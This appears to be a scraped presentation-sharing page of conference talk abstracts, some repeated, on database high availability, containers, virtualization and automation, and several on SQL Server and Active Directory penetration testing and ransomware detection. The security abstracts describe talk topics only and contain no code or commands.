This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
Sections Updated for OWASP Meeting:
- SQL Server Link Crawling
- UNC path injection targets
- Command execution details
Making MySQL highly available using Oracle Grid InfrastructureIlmar Kerm
This presentation describes how Oracle Grid Infrastructure can be used to bring high availability to any application and example is given using MySQL.
Publicly delivered:
OUGE Meetup Feb, 2014
Oracle Technology Day in Tallinn 2014
OUGN Spring Conference 2014
OUGF Harmony 2014
This is a high level presentation I delivered at BIWA Summit. It's just some high level thoughts related to today's NoSQL and Hadoop SQL engines (not deeply technical).
End-to-end Troubleshooting Checklist for Microsoft SQL ServerKevin Kline
Learning how to detect, diagnose and resolve performance problems in SQL Server is tough. Often, years are spent learning how to use the tools and techniques that help you detect when a problem is occurring, diagnose the root-cause of the problem, and then resolve the problem.
In this session, attendees will see demonstrations of the tools and techniques which make difficult troubleshooting scenarios much faster and easier, including:
• XEvents, Profiler/Traces, and PerfMon
• Using Dynamic Management Views (DMVs)
• Advanced Diagnostics Using Wait Stats
• Reading SQL Server execution plan
Every DBA needs to know how to keep their SQL Server in tip-top condition, and you’ll need skills the covered in this session to do it.
Making MySQL highly available using Oracle Grid InfrastructureIlmar Kerm
This presentation describes how Oracle Grid Infrastructure can be used to bring high availability to any application and example is given using MySQL.
Publicly delivered:
OUGE Meetup Feb, 2014
Oracle Technology Day in Tallinn 2014
OUGN Spring Conference 2014
OUGF Harmony 2014
This is a high level presentation I delivered at BIWA Summit. It's just some high level thoughts related to today's NoSQL and Hadoop SQL engines (not deeply technical).
End-to-end Troubleshooting Checklist for Microsoft SQL ServerKevin Kline
Learning how to detect, diagnose and resolve performance problems in SQL Server is tough. Often, years are spent learning how to use the tools and techniques that help you detect when a problem is occurring, diagnose the root-cause of the problem, and then resolve the problem.
In this session, attendees will see demonstrations of the tools and techniques which make difficult troubleshooting scenarios much faster and easier, including:
• XEvents, Profiler/Traces, and PerfMon
• Using Dynamic Management Views (DMVs)
• Advanced Diagnostics Using Wait Stats
• Reading SQL Server execution plan
Every DBA needs to know how to keep their SQL Server in tip-top condition, and you’ll need skills the covered in this session to do it.
SQL Server Alwayson for SharePoint HA/DR Step by Step GuideLars Platzdasch
SQL Server Alwayson for Sharepoint HA/DR SQL Konferenz 2017
-What is SQL Server AlwaysOn?
-AlwaysOn Failover Clustering
-AlwaysOn Availability Groups
-Why AlwaysOn Availability Groups for SharePoint?
-Requirements and Prerequisites
-Step by Step guide to implementing AlwaysOn Availability Groups
Demonstration
lessons learned
Unbreakable SharePoint 2013 with SQL Server Always On Availability Groups (HA...serge luca
SharePoint 2013 High Availability and Disaster Recovery with SQL Server Always On Availability Groups (HA and DR) - SharePoint Saturday Helsinki-Serge Luca (SharePoint MVP) et Isabelle Van Campenhoudt(SQ Server MVP); ShareQL, Belgium
SQL Server 2017 will bring SQL Server to Linux for the first time. This presentation covers the scope, schedule, and architecture as well as a background on why Microsoft is making SQL Server available on Linux.
Technologies Referenced: Akka, Typesafe Reactive Platform
Technical Level: Introductory
Audience: Senior Developers, Architects
Presenter: Konrad Malawski, Akka Software Engineer, Typesafe, Inc.
Akka is a runtime framework for building resilient, distributed applications in Java or Scala. In this webinar, Konrad Malawski discusses the roadmap and features of the upcoming Akka 2.4.0 and reveals three upcoming enhancements that enterprises will receive in the latest certified, tested build of Typesafe Reactive Platform.
Akka Split Brain Resolver (SBR)
Akka SBR provides advanced recovery scenarios in Akka Clusters, improving on the safety of Akka’s automatic resolution to avoid cascading partitioning.
Akka Support for Docker and NAT
Run Akka Clusters in Docker containers or NAT with complete hostname and port visibility on Java 6+ and Akka 2.3.11+
Akka Long-Term Support
Receive Akka 2.4 support for Java 6, Java 7, and Scala 2.10
One Path to a Successful Implementation of NaturalONESoftware AG
One path to a successful implementation of NaturalONE | Software AG
Join the Natural Administration team from Texas Comptroller of Public Accounts and discover how they overcame programmer resistance to successfully implement and thrive using NaturalONE and DevOPs. Get tips and techniques as well as real-world samples of architecture, configuration and implementations.
The Texas Comptroller of Public Accounts successfully implemented NaturalONE in the spring of 2019, deploying the NaturalONE client to 40+ Windows 10 laptops, and upgraded to mainframe Natural V9 a few months later. We had a rocky start and a lot of resistance from senior programmers, but we survived and are thriving – even the programmer with Natural 1.2 mainframe editing experience has made the leap and is editing Natural code in NaturalONE.
Join us as we share our experienced-based insights on the following topics:
- How to get your programming staff to accept the change to NaturalONE
- Overview of TX CPA NDV Architecture for Application Development Life Cycle
- Sample an NDV configuration reference guide provided to NaturalONE users
- Discuss differences between configuration files for NDV batch server and NDV server with the CICS adapter
- How to set up NDV Monitor (NATMOPI)
- Review pre-requisites/restrictions to adhere to for NDV CICS Adapter
- External Security Configuration requirements you won’t want to miss
- How do I DEBUG code in NaturalONE? (Just an overview reference)
- Lessons learned from issues we encountered, so you can have a smoother implementation
- Tips and techniques for using NaturalONE features that highlight the power of the NaturalONE IDE
To learn more about Software AG’s NaturalOne, please visit https://www.softwareag.com/en_corporate/platform/adabas-natural/devops.html
Introducing Node.js in an Oracle technology environment (including hands-on)Lucas Jellema
This presentation introduces Node.js in a few simple, straightforward steps. First, Node.js is presented as just JavaScript on the browser, then HTTP handling is discussed with core module http and subsequently using Express. Running Oracle JET from Node.js is explained. The implementation of APIs - REST services supporting various [operations on] resources is discussed. The single-thread nature of Node.js is presented, along with the essentials of asynchrous programming, working with callbacks and using the async module. The Node Oracle DB Database driver is introduced and demonstrated. Finally, further steps are suggested. This presentation is supported by a set of resources that constitute a three hour hands on session - sources are in GitHub https://github.com/lucasjellema/sig-nodejs-amis-2016.
OUG Ireland Meet-up - Updates from Oracle Open World 2016Brendan Tierney
OUG Ireland meet-up held on 20th October 20116, with presentations on updates from Oracle Open World 2016. Covering Tech/Database, Big Data, Analyitcs, and Oracle Cloud
AUDWC 2016 - Using SQL Server 20146 AlwaysOn Availability Groups for SharePoi...Michael Noel
SQL Server 2016 provides for unprecedented high availability and disaster recovery options for SharePoint farms in the form of AlwaysOn Availability Groups. Using this new technology, SharePoint architects can provide for near-instant failover at the data tier, without the risk of any data loss. In addition, the latest version of this technology, available with SQL Server 2016, allows for replicas of SharePoint databases to be stored in the cloud in Microsoft’s Azure cloud offering. This technology, which will be demonstrated live, completely changes the data tier design options for SharePoint and revolutionises high availability options for a farm. This session covers in step-by-step detail the exact configuration required to enable this functionality for a SharePoint 2013 farm, based on the best practices, tips and tricks, and real-world experience of the presenter in deploying this technology in production.
Understand the differences between SQL AlwaysOn options, and determine the requirements to deploy the technologies
Examine how SQL Server 2016 AlwaysOn Availability Groups can provide aggressive Service Level Agreements (SLAs) with a Recovery Point Objective (RPO) of zero and a Recovery Time Objective (RTO) of a few seconds.
See the exact steps required to enable SQL Server 2016 AlwaysOn Availability Groups for a SharePoint 2013 On-Premises environment, including options for storing replicas in Microsoft’s Azure cloud service.
This is the second session of the learning pathway at PASS Summit 2019, which is still a stand alone session to teach you how to write proper Linux BASH scripts
Galera Cluster for MySQL vs MySQL (NDB) Cluster: A High Level Comparison Severalnines
Galera Cluster for MySQL, Percona XtraDB Cluster and MariaDB Cluster (the three “flavours” of Galera Cluster) make use of the Galera WSREP libraries to handle synchronous replication.MySQL Cluster is the official clustering solution from Oracle, while Galera Cluster for MySQL is slowly but surely establishing itself as the de-facto clustering solution in the wider MySQL eco-system.
In this webinar, we will look at all these alternatives and present an unbiased view on their strengths/weaknesses and the use cases that fit each alternative.
This webinar will cover the following:
MySQL Cluster architecture: strengths and limitations
Galera Architecture: strengths and limitations
Deployment scenarios
Data migration
Read and write workloads (Optimistic/pessimistic locking)
WAN/Geographical replication
Schema changes
Management and monitoring
In this presentation Guido Schmutz talks about Apache Kafka, Kafka Core, Kafka Connect, Kafka Streams, Kafka and "Big Data"/"Fast Data Ecosystems, Confluent Data Platform and Kafka in Architecture.
This slide deck describes some of the best practices found when running Oracle Database inside a Docker container. Those best practices are general observations collected over time and may not reflect your actual environment or current situation.
This presentation talks about the different ways of getting SQL Monitoring reports, reading them correctly, common issues with SQL Monitoring reports - and plenty of Oracle 12c-specific improvements!
SQL Server Alwayson for SharePoint HA/DR Step by Step GuideLars Platzdasch
SQL Server Alwayson for Sharepoint HA/DR SQL Konferenz 2017
-What is SQL Server AlwaysOn?
-AlwaysOn Failover Clustering
-AlwaysOn Availability Groups
-Why AlwaysOn Availability Groups for SharePoint?
-Requirements and Prerequisites
-Step by Step guide to implementing AlwaysOn Availability Groups
Demonstration
lessons learned
Unbreakable SharePoint 2013 with SQL Server Always On Availability Groups (HA...serge luca
SharePoint 2013 High Availability and Disaster Recovery with SQL Server Always On Availability Groups (HA and DR) - SharePoint Saturday Helsinki-Serge Luca (SharePoint MVP) et Isabelle Van Campenhoudt(SQ Server MVP); ShareQL, Belgium
SQL Server 2017 will bring SQL Server to Linux for the first time. This presentation covers the scope, schedule, and architecture as well as a background on why Microsoft is making SQL Server available on Linux.
Technologies Referenced: Akka, Typesafe Reactive Platform
Technical Level: Introductory
Audience: Senior Developers, Architects
Presenter: Konrad Malawski, Akka Software Engineer, Typesafe, Inc.
Akka is a runtime framework for building resilient, distributed applications in Java or Scala. In this webinar, Konrad Malawski discusses the roadmap and features of the upcoming Akka 2.4.0 and reveals three upcoming enhancements that enterprises will receive in the latest certified, tested build of Typesafe Reactive Platform.
Akka Split Brain Resolver (SBR)
Akka SBR provides advanced recovery scenarios in Akka Clusters, improving on the safety of Akka’s automatic resolution to avoid cascading partitioning.
Akka Support for Docker and NAT
Run Akka Clusters in Docker containers or NAT with complete hostname and port visibility on Java 6+ and Akka 2.3.11+
Akka Long-Term Support
Receive Akka 2.4 support for Java 6, Java 7, and Scala 2.10
One Path to a Successful Implementation of NaturalONESoftware AG
One path to a successful implementation of NaturalONE | Software AG
Join the Natural Administration team from Texas Comptroller of Public Accounts and discover how they overcame programmer resistance to successfully implement and thrive using NaturalONE and DevOPs. Get tips and techniques as well as real-world samples of architecture, configuration and implementations.
The Texas Comptroller of Public Accounts successfully implemented NaturalONE in the spring of 2019, deploying the NaturalONE client to 40+ Windows 10 laptops, and upgraded to mainframe Natural V9 a few months later. We had a rocky start and a lot of resistance from senior programmers, but we survived and are thriving – even the programmer with Natural 1.2 mainframe editing experience has made the leap and is editing Natural code in NaturalONE.
Join us as we share our experienced-based insights on the following topics:
- How to get your programming staff to accept the change to NaturalONE
- Overview of TX CPA NDV Architecture for Application Development Life Cycle
- Sample an NDV configuration reference guide provided to NaturalONE users
- Discuss differences between configuration files for NDV batch server and NDV server with the CICS adapter
- How to set up NDV Monitor (NATMOPI)
- Review pre-requisites/restrictions to adhere to for NDV CICS Adapter
- External Security Configuration requirements you won’t want to miss
- How do I DEBUG code in NaturalONE? (Just an overview reference)
- Lessons learned from issues we encountered, so you can have a smoother implementation
- Tips and techniques for using NaturalONE features that highlight the power of the NaturalONE IDE
To learn more about Software AG’s NaturalOne, please visit https://www.softwareag.com/en_corporate/platform/adabas-natural/devops.html
Introducing Node.js in an Oracle technology environment (including hands-on)Lucas Jellema
This presentation introduces Node.js in a few simple, straightforward steps. First, Node.js is presented as just JavaScript on the browser, then HTTP handling is discussed with core module http and subsequently using Express. Running Oracle JET from Node.js is explained. The implementation of APIs - REST services supporting various [operations on] resources is discussed. The single-thread nature of Node.js is presented, along with the essentials of asynchrous programming, working with callbacks and using the async module. The Node Oracle DB Database driver is introduced and demonstrated. Finally, further steps are suggested. This presentation is supported by a set of resources that constitute a three hour hands on session - sources are in GitHub https://github.com/lucasjellema/sig-nodejs-amis-2016.
OUG Ireland Meet-up - Updates from Oracle Open World 2016Brendan Tierney
OUG Ireland meet-up held on 20th October 20116, with presentations on updates from Oracle Open World 2016. Covering Tech/Database, Big Data, Analyitcs, and Oracle Cloud
AUDWC 2016 - Using SQL Server 20146 AlwaysOn Availability Groups for SharePoi...Michael Noel
SQL Server 2016 provides for unprecedented high availability and disaster recovery options for SharePoint farms in the form of AlwaysOn Availability Groups. Using this new technology, SharePoint architects can provide for near-instant failover at the data tier, without the risk of any data loss. In addition, the latest version of this technology, available with SQL Server 2016, allows for replicas of SharePoint databases to be stored in the cloud in Microsoft’s Azure cloud offering. This technology, which will be demonstrated live, completely changes the data tier design options for SharePoint and revolutionises high availability options for a farm. This session covers in step-by-step detail the exact configuration required to enable this functionality for a SharePoint 2013 farm, based on the best practices, tips and tricks, and real-world experience of the presenter in deploying this technology in production.
Understand the differences between SQL AlwaysOn options, and determine the requirements to deploy the technologies
Examine how SQL Server 2016 AlwaysOn Availability Groups can provide aggressive Service Level Agreements (SLAs) with a Recovery Point Objective (RPO) of zero and a Recovery Time Objective (RTO) of a few seconds.
See the exact steps required to enable SQL Server 2016 AlwaysOn Availability Groups for a SharePoint 2013 On-Premises environment, including options for storing replicas in Microsoft’s Azure cloud service.
This is the second session of the learning pathway at PASS Summit 2019, which is still a stand alone session to teach you how to write proper Linux BASH scripts
Galera Cluster for MySQL vs MySQL (NDB) Cluster: A High Level Comparison Severalnines
Galera Cluster for MySQL, Percona XtraDB Cluster and MariaDB Cluster (the three “flavours” of Galera Cluster) make use of the Galera WSREP libraries to handle synchronous replication.MySQL Cluster is the official clustering solution from Oracle, while Galera Cluster for MySQL is slowly but surely establishing itself as the de-facto clustering solution in the wider MySQL eco-system.
In this webinar, we will look at all these alternatives and present an unbiased view on their strengths/weaknesses and the use cases that fit each alternative.
This webinar will cover the following:
MySQL Cluster architecture: strengths and limitations
Galera Architecture: strengths and limitations
Deployment scenarios
Data migration
Read and write workloads (Optimistic/pessimistic locking)
WAN/Geographical replication
Schema changes
Management and monitoring
In this presentation Guido Schmutz talks about Apache Kafka, Kafka Core, Kafka Connect, Kafka Streams, Kafka and "Big Data"/"Fast Data Ecosystems, Confluent Data Platform and Kafka in Architecture.
This slide deck describes some of the best practices found when running Oracle Database inside a Docker container. Those best practices are general observations collected over time and may not reflect your actual environment or current situation.
This presentation talks about the different ways of getting SQL Monitoring reports, reading them correctly, common issues with SQL Monitoring reports - and plenty of Oracle 12c-specific improvements!
OpenShift is Red Hat's Platform-as-a-Service (PaaS) that lets developers quickly develop, host, and scale Docker container-based applications. OpenShift enables a uniform and standardised approach to container management across all hosting options including AWS/EC2 and other private/public cloud and on/off-premise variants. At this session, you will learn how Red Hat's enterprise clients are using OpenShift to enable their digital transformation initiatives. Examples will cover how realising a hybrid cloud strategy can simplify and reduce the risk of migrating and transitioning application workloads to containers in the cloud.
Alex Smith, Solutions Architect, Amazon Web Services, ASEAN
Stephen Bylo, Senior Solution Architect, Red Hat Asia Pacific Pte Ltd
Kubernetes is an open source container cluster orchestration platform founded by Google. This presentation covers an overview of it's main concepts, plus how it fits into Google Cloud Platform. This was delivered by Kit Merker at DevNexus 2015 in Atlanta.
By Rafael Benevides and Christian Posta
A lot of functionality necessary for running in a microservices architecture have been built into Kubernetes; why would you re-invent the wheel with lots of complicated client-side libraries? Have you ever asked why you should use containers and what are the benefits for your application? This talk will present a microservices application that have been built using different Java platforms: WildFly Swarm and Vert.x. Then we will deploy this application in a Kubernetes cluster to present the advantages of containers for MSA (Microservices Architectures) and DevOps. The attendees will learn how to create, edit, build, deploy Java Microservices, and also how to perform service discovery, rolling updates, persistent volumes and much more. Finally we will fix a bug and see how a CI/CD Pipeline automates the process and reduces the deployment time.
XPDS16: High-Performance Virtualization for HPC Cloud on Xen - Jun Nakajima &...The Linux Foundation
We have been working to get Xen up and running on self-boot Intel® Xeon Phi processors to build HPC clouds. We see several challenges because of the unique (but not unusual for HPC) hardware technologies and performance requirements. For example, such hardware technologies include 1) >256 CPUs, 2) MCDRAM (high-bandwidth memory), 3) integrated fabric (i.e. Intel® Omni-Path). Unlike the “coprocessor“ model, supporting self-boot with >256 CPUs has various implications to Xen, including scheduling and scalability. We need to allow user applications to use MCDRAM directly to perform optimally. Also, we need to enable the integrated HPC fabric for the VM to use by direct I/O assignment.
In addition, we have only a single VM on each node to meet the high-performance requirements of HPC clouds. This (i.e. non-shared) model allowed us to optimize Xen more. In this talk, we share our design and lessons, and discuss the options we considered to achieve high-performance virtualization for HPC.
OSCON16: Analysis of the Xen code review process: An example of software deve...The Linux Foundation
The Xen Project’s code contributions have been growing 10% a year. However, during this period of growth, the code review process became much slower, leading to issues in the community. Code review in the Xen Project—as in many other FOSS projects—is performed on mailing lists. During the last few years, the project observed an increase in the number of messages devoted to code review—in particular, an increase in the number of code review messages per patch series or individual patch.
Everyone in the community had a different theory as to the root causes of the issues based on their observations: some developers believed we didn’t have enough reviewers, some felt the project’s maintainers had become more aggressive, and some felt code review was not coordinated enough. Many observations contradicted each other and were based only on opinions. Consequently, key members of the project could not agree on how to deal with the perceived issues.
Lars Kurth and Daniel Izquierdo explain why the project decided to use data mining techniques using software development analytics to address the issue. The project needed a detailed analysis to verify which theories were valid, which were not, and which were missed. To do this, the team defined a number of parameters in the code review process to determine if it was deteriorating in some way and pinpoint the root causes of this deterioration, if any. Lars and Daniel cover the project’s journey through a number of stories and explore the techniques that enabled the community to improve their review process.
Very short overview of the Xen Project Release and Roadmap Process (for the blog). It covers the process valid up to and including Xen 4.6, and the approved proposal for Xen 4.7 and newer.
Hypervisors are becoming more and more widespread in embedded environments, from automotive to medical and avionics. Their use case is different from traditional server and desktop virtualization, and so are their requirements. This talk will explain why hypervisors are used in embedded, and the unique challenges posed by these environments to virtualization technologies.
Xen, a popular open source hypervisor, was born to virtualize x86 Linux systems for the data center. It is now the leading open source hypervisor for ARM embedded platforms. The presentation will show how the ARM port of Xen differs from its x86 counterpart. It will go through the fundamental design decisions that made Xen a good choice for ARM embedded virtualization. The talk will explain the implementation of key features such as device assignment and interrupt virtualization.
Hypervisors and Virtualization - VMware, Hyper-V, XenServer, and KVMvwchu
With co-presenter Maninder Singh, delivered a presentation about hypervisors and virtualization technology for an independent topic study project for the Operating System Design (EECS 4221) course at York University, Canada in October 2014.
Virtualization, briefly, is the separation of resources or requests for a service from the underlying physical delivery of that service. It is a concept in which access to a single underlying piece of hardware is coordinated so that multiple guest operating systems can share a single piece of hardware, with no guest operating system being aware that it is actually sharing anything at all.
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally we?ll show how PowerShell automation can be used to execute the SQL Server attacks on scale. All scripts created and demonstrated during the presentation will be open sourced. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
This is the presentation we provided at the 2018 Blackhat USA Arsenal to introduce PowerUpSQL. PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. This should be interesting to red, blue, and purple teams interested in automating day to day tasks involving SQL Server.
More information can be found at:
https://github.com/NetSPI/PowerUpSQL/wiki
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
This presentation will cover 10 common weak SQL Server configurations and the practical attacks that help hackers gain unauthorized access to data, applications, and systems. This will include a few demonstrations of the techniques that are being used during real-world attacks and penetration tests. This should be interesting to developers, new database admins, and aspiring penetration testers looking to gain a better understanding of the risks associated with weak SQL Server configurations.
Full Video Presentation: http://youtu.be/SIeMz6gCK3Q
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
SQL Server R Services: What Every SQL Professional Should KnowBob Ward
SQL Server 2016 introduces a new platform for building intelligent, advanced analytic applications called SQL Server R Services. This session is for the SQL Server Database professional to learn more about this technology and its impact on managing a SQL Server environment. We will cover the basics of this technology but also look at how it works, troubleshooting topics, and even usage case scenarios. You don't have to be a data scientist to understand SQL Server R Services but you need to know how this works so come upgrade you career by learning more about SQL Server and advanced analytics.
A short course I had few weeks ago that I wanted to share with you. All the MySQL issues from basics to experts: tuning, ERD, DDL, DML, Backup, Security
This workshop handles the concept of using Object Relational Mapping features from ColdFusion 9 in AIR to synchronise your local database with a remote server without writing any SQL code.
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Scott Sutherland
During this presentation, we’ll talk about how to identify and triage the large volume of excessive access most standard Active Directory users have to common network shares. Over the course of hundreds of internal network penetration tests and audits one theme has stood out, vulnerability management programs do not adequately identify excessive share privileges. The excessive shares have become a risk for data exposure, ransomware attacks, and privilege escalation within enterprise environments. During this discussion, we will talk about why this gap exists, how to inventory excessive share across an entire Active Directory domain quickly, and how to triage those results to help reduce risk for your organization.
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
Ransomware is a strategy for adversaries to make money – a strategy that’s proven successful. During this presentation, we will cover how ransomware works, ransomware trends to watch, best practices for prevention, and more. At the core of the discussion, Scott will explain how to build detections for common tactics, techniques, and procedures (TTPs) used by ransomware families and how to validate they work, ongoing, as part of the larger security program. Participants will leave this webinar with actionable advice to ensure their organization is more resilient to ever-evolving ransomware attacks.
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation.
This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
This presentation provides an overview off common adversarial emulation approaches along with attack and detection trends. It should be interesting to penetration testers and professionals in security operations roles.
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks.
This is the version modified for the OWASP meeting in June of 2014.
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. This talk includes real-world examples of attacks that they use on a daily basis, and some reflections on what techniques have changed over the last year. Vulnerabilities related to the application, network, and server layers will all be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide an overview of common methods that can be used to obtain clear text credentials from Microsoft products such as Windows, IIS, and SQL Server. It also provides an overview of the proof of concept script used to recover MSSQL Linked Server passwords.
Relevant blog links have been provided below.
https://www.netspi.com/blog/entryid/215/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1
https://www.netspi.com/blog/entryid/226/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2
https://www.netspi.com/blog/entryid/221/decrypting-mssql-database-link-server-passwords
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in most IT security programs. It will also include a brief overview of the common skill sets and tools used by today’s security professionals. Finally, it will offer some basic advice for getting started in penetration testing. This should be interesting to aspiring pentesters trying to gain a better understanding of how penetration testing fits into the larger IT security world.
Additional resources can be found in the blog below:
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. Karl Fosaaen and I put this together for Secure 360 in Minneapolis. We hope you enjoy it.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will take a high level look at the malware life cycle and the role that both hackers and IT professionals play in it. It should be interesting to IT professionals as well as individuals interested in learning more about the general approach used by hackers to gain unauthorized access to systems, applications, and sensitive data.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide a high level overview of the current role that desktop applications play in enterprise environments, and the general risks associated with different deployment models. It will also cover common methodologies, techniques, and tools used to identify vulnerabilities in typical desktop application implementations. Although there will be some technical content. The discussion should be interesting and accessible to both operational and management levels.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:
Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in IT security.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
